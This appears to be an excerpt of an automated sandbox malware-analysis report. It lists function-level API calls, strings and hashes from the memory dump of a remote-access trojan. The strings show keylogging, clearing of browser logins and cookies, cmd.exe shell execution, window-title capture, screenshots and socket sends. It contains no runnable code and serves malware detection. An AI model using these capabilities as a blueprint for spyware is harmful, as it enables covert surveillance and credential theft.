                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ProcessWindow$Open$TextThreadVisible
                                        • String ID: (FG
                                        • API String ID: 3142014140-2273637114
                                        • Opcode ID: 9c79950384effebaea9bf5315d724d682c4e552b57ef82da1617336c4fbf6aa3
                                        • Instruction ID: 0f4eca603db080fccf2d1fd4ef2663101a063c6717372172f7cb8e83fece0a9a
                                        • Opcode Fuzzy Hash: 9c79950384effebaea9bf5315d724d682c4e552b57ef82da1617336c4fbf6aa3
                                        • Instruction Fuzzy Hash: 4871E5321082454AC325FB61D8A5ADFB3E4AFE4308F50453EF58A530E1EF746A49CB9A
                                        APIs
                                        • _strpbrk.LIBCMT ref: 0044D4B8
                                        • _free.LIBCMT ref: 0044D5D5
                                          • Part of subcall function 0043A864: IsProcessorFeaturePresent.KERNEL32(00000017,0043A836,00000000,0000000A,0000000A,00000000,0041AD77,00000022,?,?,0043A843,00000000,00000000,00000000,00000000,00000000), ref: 0043A866
                                          • Part of subcall function 0043A864: GetCurrentProcess.KERNEL32(C0000417,0000000A,00000000), ref: 0043A888
                                          • Part of subcall function 0043A864: TerminateProcess.KERNEL32(00000000), ref: 0043A88F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                        • String ID: *?$.
                                        • API String ID: 2812119850-3972193922
                                        • Opcode ID: 3ccd6c7c6263025d80bbf4df8e19646480fb990c35b4b1cfbff97afb24dbcef1
                                        • Instruction ID: 5f997c8b803d418df4da1c9987192ed3b052b04d21a58de33721a68e59565ce0
                                        • Opcode Fuzzy Hash: 3ccd6c7c6263025d80bbf4df8e19646480fb990c35b4b1cfbff97afb24dbcef1
                                        • Instruction Fuzzy Hash: AC519571D00209AFEF14DFA9C841AAEB7B5EF58318F24816FE454E7341DA799E01CB54
                                        APIs
                                        • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                          • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                          • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                          • Part of subcall function 0041B6BA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6CF
                                          • Part of subcall function 00404468: send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                        • String ID: XCG$`AG$>G
                                        • API String ID: 2334542088-2372832151
                                        • Opcode ID: 00ea031b35fe0dcf3e6aee1b05692aa2f53a6727008682770bd88c291a01c214
                                        • Instruction ID: 51992e77998e29381c1adf086b38d2340c1e01042c89ae8fe5bc0f900910b53e
                                        • Opcode Fuzzy Hash: 00ea031b35fe0dcf3e6aee1b05692aa2f53a6727008682770bd88c291a01c214
                                        • Instruction Fuzzy Hash: 5E5132321042405AC325F775D8A2AEF73E5ABE4308F50493FF94A631E2EE785949C69E
                                        APIs
                                        • send.WS2_32(000002FC,00000000,00000000,00000000), ref: 004044FD
                                        • WaitForSingleObject.KERNEL32(00000328,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                        • SetEvent.KERNEL32(00000328,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: EventObjectSingleWaitsend
                                        • String ID: LAL
                                        • API String ID: 3963590051-3302426157
                                        • Opcode ID: 889e258d40d688e8ee903db4c56f8f2297e8d08d484f71769d69523f674e6bf6
                                        • Instruction ID: 8f6f307dcfa5e25975ae7096dc57d747427bb4b25c3784bf73346896dbb4b4c1
                                        • Opcode Fuzzy Hash: 889e258d40d688e8ee903db4c56f8f2297e8d08d484f71769d69523f674e6bf6
                                        • Instruction Fuzzy Hash: B82123B29001196BCF04ABA5DC96DEE777CBF54358B00413EF916B21E1EA78AA04D6A4
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                          • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,75573530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                                          • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                          • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                          • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                        • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                        • String ID: /sort "Visit Time" /stext "$8>G
                                        • API String ID: 368326130-2663660666
                                        • Opcode ID: 247849771554e330f4c56d3a549adbf02a50afc28c9a0bb45716f413473523db
                                        • Instruction ID: 14a2de6876ab63adfaf4c6869ac5cc0218acab93288f76d9a5f97452818968e4
                                        • Opcode Fuzzy Hash: 247849771554e330f4c56d3a549adbf02a50afc28c9a0bb45716f413473523db
                                        • Instruction Fuzzy Hash: 36317331A0021556CB14FBB6DC969EE7775AF90318F40007FF906B71D2EF385A8ACA99
                                        APIs
                                        • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                        • wsprintfW.USER32 ref: 0040A905
                                          • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: EventLocalTimewsprintf
                                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                        • API String ID: 1497725170-1359877963
                                        • Opcode ID: f1131f2c5aa9efe0aa35bfe1aadc190762ac6710f9a6fccd412707abd6ba0ca2
                                        • Instruction ID: fc972a95d23854bc9b4bbea89c8e615d9b1bb69bfa4db415bad433d1ad0b57c3
                                        • Opcode Fuzzy Hash: f1131f2c5aa9efe0aa35bfe1aadc190762ac6710f9a6fccd412707abd6ba0ca2
                                        • Instruction Fuzzy Hash: 5A118172400118AACB18FB56EC55CFE77B8AE48325F00013FF842620D1EF7C5A86C6E8
                                        APIs
                                          • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                          • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                        • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                        • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                        • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateThread$LocalTime$wsprintf
                                        • String ID: Online Keylogger Started
                                        • API String ID: 112202259-1258561607
                                        • Opcode ID: 35bc90d2576dbeac95018a630539701253067ab5c51327a8f4703c5e34731f69
                                        • Instruction ID: 11da804b7f4806bc819379157d14523832a74cbdaa40f75774c11a3885c9476d
                                        • Opcode Fuzzy Hash: 35bc90d2576dbeac95018a630539701253067ab5c51327a8f4703c5e34731f69
                                        • Instruction Fuzzy Hash: 8A01C4916003093AE62076368C8BDBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                        APIs
                                        • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAD9
                                        • GetLastError.KERNEL32(?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAE3
                                        • __dosmaperr.LIBCMT ref: 0044AB0E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseErrorHandleLast__dosmaperr
                                        • String ID: `@
                                        • API String ID: 2583163307-951712118
                                        • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                        • Instruction ID: 27d3a2ced18f85a81fd98b99658ced531467de2cab5132fdd739c317d4e1371d
                                        • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                        • Instruction Fuzzy Hash: 56016F3664452016F7215274694977F774D8B42738F25036FF904972D2DD6D8CC5C19F
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                        • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                        • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEventHandleObjectSingleWait
                                        • String ID: Connection Timeout
                                        • API String ID: 2055531096-499159329
                                        • Opcode ID: f305bfd07311d1c13337a4e5318bcab9ce6904fe2946ae268386a72c1b1384b4
                                        • Instruction ID: 87453c7fdf87cbb5f51522b6001dca4eac29197b42c1cd59420238f874304a49
                                        • Opcode Fuzzy Hash: f305bfd07311d1c13337a4e5318bcab9ce6904fe2946ae268386a72c1b1384b4
                                        • Instruction Fuzzy Hash: 5F01F5B1900B41AFD325BB3A9C4655ABBE0AB45315700053FF6D396BB1DA38E840CB5A
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                          • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 004347EC
                                          • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 00434810
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                        • String ID: bad locale name
                                        • API String ID: 3628047217-1405518554
                                        • Opcode ID: ea2ce83f6b871e45ddc414103f177035841d2320bb142f548fd828e1a6c8a0e7
                                        • Instruction ID: 10a02b8eb17e148bebaf39200f5874f6183f8458c9cdff10c330f193d408b506
                                        • Opcode Fuzzy Hash: ea2ce83f6b871e45ddc414103f177035841d2320bb142f548fd828e1a6c8a0e7
                                        • Instruction Fuzzy Hash: 3FF0A471400204EAC324FB23D853ACA73649F54748F90497FB446214D2FF3CB618CA8C
                                        APIs
                                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExecuteShell
                                        • String ID: /C $cmd.exe$open
                                        • API String ID: 587946157-3896048727
                                        • Opcode ID: ee6d09c7a5be61fc2c77f0fe381f15b1933766d643093560b744fac4f5f657b7
                                        • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                        • Opcode Fuzzy Hash: ee6d09c7a5be61fc2c77f0fe381f15b1933766d643093560b744fac4f5f657b7
                                        • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __alldvrm$_strrchr
                                        • String ID:
                                        • API String ID: 1036877536-0
                                        • Opcode ID: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                        • Instruction ID: 44e25d054e292963cfc005d68317528f4d38ac36d82b99eb29904231438c363e
                                        • Opcode Fuzzy Hash: 63f75d4c6ddf9dfadee5a9a28b1451e266bcc439c32975fae3941ae33d1a5297
                                        • Instruction Fuzzy Hash: C5A14671A042469FFB218F58C8817AFBBA1EF25354F28416FE5859B382CA3C8D45C759
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: fc29a47a32afb3350fc3e3c96543f328580f9b5143c0f3ce58bfce5294a38304
                                        • Instruction ID: 20fe87377ae66d6b83c96c89e5a9e0461ad99f2e5d6db859ec29947640f8945c
                                        • Opcode Fuzzy Hash: fc29a47a32afb3350fc3e3c96543f328580f9b5143c0f3ce58bfce5294a38304
                                        • Instruction Fuzzy Hash: CB412D31A00E005BEF24AAB94CD567F37A4EF05775F18031FFC1496293D67C8C05869A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Strings
                                        • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                        • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                        Similarity
                                        • API ID: Sleep
                                        • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                        • API String ID: 3472027048-1236744412
                                        APIs
                                          • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                          • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                          • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                        • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                        Similarity
                                        • API ID: CloseOpenQuerySleepValue
                                        • String ID: @CG$exepath$BG
                                        • API String ID: 4119054056-3221201242
                                        Similarity
                                        • API ID: SystemTimes$Sleep__aulldiv
                                        • String ID:
                                        • API String ID: 188215759-0
                                        APIs
                                          • Part of subcall function 0041B6F6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B706
                                          • Part of subcall function 0041B6F6: GetWindowTextLengthW.USER32(00000000), ref: 0041B70F
                                          • Part of subcall function 0041B6F6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B739
                                        • Sleep.KERNEL32(000001F4), ref: 00409C95
                                        • Sleep.KERNEL32(00000064), ref: 00409D1F
                                        Similarity
                                        • API ID: Window$SleepText$ForegroundLength
                                        • String ID: [ $ ]
                                        • API String ID: 3309952895-93608704
                                        APIs
                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 0043811F
                                          • Part of subcall function 0043806C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043809B
                                          • Part of subcall function 0043806C: ___AdjustPointer.LIBCMT ref: 004380B6
                                        • _UnwindNestedFrames.LIBCMT ref: 00438134
                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438145
                                        • CallCatchBlock.LIBVCRUNTIME ref: 0043816D
                                        Similarity
                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                        • String ID:
                                        • API String ID: 737400349-0
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004471C7,00000000,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue), ref: 00447252
                                        • GetLastError.KERNEL32(?,004471C7,00000000,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446FA1), ref: 0044725E
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471C7,00000000,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044726C
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B657
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B67C
                                        • CloseHandle.KERNEL32(00000000), ref: 0041B68A
                                        Similarity
                                        • API ID: File$CloseCreateHandleReadSize
                                        • String ID:
                                        • API String ID: 3919263394-0
                                        APIs
                                        • GetSystemMetrics.USER32(0000004C), ref: 00418529
                                        • GetSystemMetrics.USER32(0000004D), ref: 0041852F
                                        • GetSystemMetrics.USER32(0000004E), ref: 00418535
                                        • GetSystemMetrics.USER32(0000004F), ref: 0041853B
                                        Similarity
                                        • API ID: MetricsSystem
                                        • String ID:
                                        • API String ID: 4116985748-0
                                        APIs
                                        • __startOneArgErrorHandling.LIBCMT ref: 00441F7D
                                        Similarity
                                        • API ID: ErrorHandling__start
                                        • String ID: pow
                                        • API String ID: 3213639722-2276729525
                                        Similarity
                                        • API ID: _memcmp
                                        • String ID: 4[G$4[G
                                        • API String ID: 2931989736-4028565467
                                        APIs
                                        • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB69
                                        Similarity
                                        • API ID: Info
                                        • String ID: $vD
                                        • API String ID: 1807457897-3636070802
                                        APIs
                                        • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417C18
                                          • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C2B,00000000,?,?,?,?,00000000), ref: 004177B6
                                        • SHCreateMemStream.SHLWAPI(00000000), ref: 00417C65
                                          • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C81,00000000,?,?), ref: 00417827
                                          • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CDC), ref: 004177CE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                        • String ID: image/jpeg
                                        • API String ID: 1291196975-3785015651
                                        • Opcode ID: d4376d3aa41ba41f336d454eb71a79e6a36b8bd1c58ceebdc91cf2e64db4f38d
                                        • Instruction ID: 3c33996df4896106dd3ee16a81609d02114e1f450a3ece369daacccd15328daf
                                        • Opcode Fuzzy Hash: d4376d3aa41ba41f336d454eb71a79e6a36b8bd1c58ceebdc91cf2e64db4f38d
